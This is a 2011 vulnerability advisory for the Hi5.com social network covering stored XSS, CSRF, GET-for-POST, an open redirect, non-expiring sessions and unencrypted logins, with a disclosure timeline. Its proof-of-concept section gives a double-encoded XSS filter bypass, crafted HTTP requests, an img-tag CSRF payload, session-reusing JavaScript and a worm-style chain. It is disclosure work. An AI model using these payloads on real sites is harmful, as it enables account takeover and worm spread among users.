============================================= INTERNET SECURITY AUDITORS ALERT 2010-11 - Original release date: 29th October 2010 - Last revised: 1st May 2011 - Discovered by: Eduardo Garcia Melia - Severity: 7.8/10 (CVSSv2 Base Scored) ============================================= I. VULNERABILITY ------------------------- Multiple vulnerabilities in Hi5.com social network. II. BACKGROUND ------------------------- Hi5 is a social network (www.hi5.com). The company was founded in 2003 by Ramu Yalamanchi. Hi5 has 80 million registered users. III. DESCRIPTION ------------------------- This social network has the next vulnerabilities: 1. POST requests can be made through GET method The application allows realizing the POST requests by means of the GET method. 2. Persistent Cross-Site Scripting (XSS) The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. 3. Cross-Site Request Forgery (CSRF) CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat or simply visiting the attacker profile ), an attacker may force the users of a web application to execute actions of the attacker's choosing. In some places of the application, no token anti-xsrf is used. In other places, use as filter anti-xsrf the session value and the timestamp. The tokens anti-xsrf are not sufficient, because the persistent XSS vulnerability allows to execute Javascript code. 4. URL Redirection A URL Redirection Attack is a kind of vulnerability that redirects you to another page freely out of the original website when accessed, usually integrated with a phishing attack. 5. The session never expires While you not logout of the application, the session never expires. 6. Transmission of sensitive information without encryption. Transmission of sensitive information without ciphered channel (HTTP protocol), allows that an attacker who has access to this traffic, capture the sensitive information that could be transmitted, as for example, the user and password or session. IV. PROOF OF CONCEPT ------------------------- 1. POST/GET With this request, auto-accept all comments on his profile automatically (this makes it possible to perform CSRF attacks more easy). Example: + POST: POST /friend/book/updateAutoAcceptSettings.do HTTP/1.1 Host: hi5.com autoAccept=0 + GET: GET /friend/book/updateAutoAcceptSettings.do?autoAccept=0 HTTP/1.1 Host: hi5.com 2. Persistent Cross-Site Scripting (XSS) In this case, you can bypass the XSS Filter for inject HTML/JavaScript code in the application both through comments in the profile as through internal mail messages, etc. The application accepts html tags such as <h1>, although many of the dangerous tags are filtered (not true with <img). To bypass the XSS Filter and inject HTML/JavaScript code, we just has double encoding: <script>alert('XSS')</script> And double encoding: <script>alert('XSS')</script> %26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B Using double encoding is it possible to be bypass XSS filters. Example: POST /friend/profile/signBook.do HTTP/1.1 Host: hi5.com userId=XXXXXX&userid=XXXXXXX×tamp=-7099815752887097952&js=022EE4CA9DBE77D9D18EF5B8E43F9C71&image=&body=%26%23x3c%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B%26%23x61%3B%26%23x6c%3B%26%23x65%3B%26%23x72%3B%26%23x74%3B%26%23x28%3B%26%23x27%3B%26%23x58%3B%26%23x53%3B%26%23x53%3B%26%23x27%3B%26%23x29%3B%26%23x3c%3B%26%23x2f%3B%26%23x73%3B%26%23x63%3B%26%23x72%3B%26%23x69%3B%26%23x70%3B%26%23x74%3B%26%23x3e%3B This POST request, shows the typical popup with the "XSS" message, but can be developed for serious attacks like Rainbow worm or other worms in already used in social networks. 3. Cross-Site Request Forgery (CSRF) There are requests in the application using anti-XSRF tokens, but others do not and have been identified and exploited. When the application do not have any token anti-xsrf, to perform this attack, the attacker would simply edit her profile, and in the interests tab, in any field put <img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>. Example: POST /friend/profile/editPersonal.do HTTP/1.1 Host: hi5.com timestamp=-5798286480324775860&userId=XXXXXXX&interests=<img%20src="/friend/book/updateAutoAcceptSettings.do?autoAccept=0"/>&origAllTimeFavoriteArtists=&allTimeFavoriteArtists=&favoriteMovies=&favoriteTVShows=&favoriteBooks=&favoriteQuote= This attack could also be exploited through parameter "interests" or any other. With this example, a person who visited the attacker's profile, auto-accept all comments on his profile automatically. On the other hand, when the applications use as token anti-xsrf the session and the timestamp, that attacker can use the persistent XSS vulnerability for injecting javascript code, that puts the session value in "js" parameter, and the timestamp value in "timestamp" parameter. For example, the normal POST request for add any friend: POST /friend/addFriendAjax.do HTTP/1.1 Host: hi5.com Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.; JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238; hi5sp=homepage; tzoffset=2; userIdLogin=hi5tok; timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId= Through GET/POST vulnerability is it possible to transform into GET request: GET /friend/addFriendAjax.do?timestamp=5718257949255914042&js=CCE9B8BAED8F1A7A0FA50BF4D39A2238&requestSource=SEARCH&userid=XXXXXX&userId= HTTP/1.1 Host: hi5.com Cookie: esn=FybWQ9s5gu1naTVi6IA0TG2vEbM.; JSESSIONID=CCE9B8BAED8F1A7A0FA50BF4D39A2238; Finally, with persistent XSS vulnerability, the attacker can inject javascript code for automation this request (OR ANY OTHER) with something like this: <script> if (true) { window.location.href = "/friend/addFriendAjax.do?timestamp=" + url.replace("TIMESTAMP", new Date().getTime()) + "&js=" + HI5.Data.sessionId() + '&requestSource=SEARCH&userid=XXXXXX&userId='; } </script> 4. URL Redirection The application allows redirect the browser to any Internet address. The goal of this attack could be make the victim feel that is correctly accesing to a resource valid resource, when in fact, is being redirected to fake man in the middle site for credential capture. Following, and example redirecting Google.com website: http://hi5.com/friend/tyTrack.do?cid=42624&id=1&e=&d=http://www.google.com 5. The session never expires The session on hi5 social network never expires. While you do not logout, the session remain active: + Set-Cookie: hi5loggedIn=true; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ 6. Transmission of sensitive using not using encryption. For example, the transmission of user and password in the authentication process. V. BUSINESS IMPACT ------------------------ These vulnerabilities allowed javascript to be run, opening a lot of possibilities to users with malicious intentions, for example, took over Hi5 social networks, infecting millions of users. One of them, is make all hi5 profiles visible (or any action): + Make an Auto-accept user comments on victim's profile through the CSRF, simply visiting the attacker's profile. + After that, the attacker write a message on victim's profile using JavaScript (persistent XSS) and would make victim's profile visible to all users. These two steps are repeated in every victim's profile and grow exponentially as users visit the victim's profile. VI. SYSTEMS AFFECTED ------------------------- Hi5.com social network. VII. SOLUTION ------------------------- - VIII. REFERENCES ------------------------- http://www.hi5.com http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Eduardo Garcia Melia (egarcia (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- October 29, 2010: First results January 02, 2011: Initial release May 01, 2011: Final revision XI. DISCLOSURE TIMELINE ------------------------- October 29, 2010: Vulnerability discovered by Internet Security Auditors January 10, 2011: First attempts for contacting hi5 networks. January 12, 2011: Received response and advisory sent to vendor. February 15, 2011: Contact for update -> under correction. March 04, 2011: Contact for update -> Still correcting. May 01, 2011: Published after some contacts without answer. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. XIII. ABOUT ------------------------- Internet Security Auditors is a Spain based leader in web application testing, network security, penetration testing, security compliance implementation and assessing. Our clients include some of the largest companies in areas such as finance, telecommunications, insurance, ITC, etc. We are vendor independent provider with a deep expertise since 2001. Our efforts in R&D include vulnerability research, open security project collaboration and whitepapers, presentations and security events participation and promotion. For further information regarding our security services, contact us.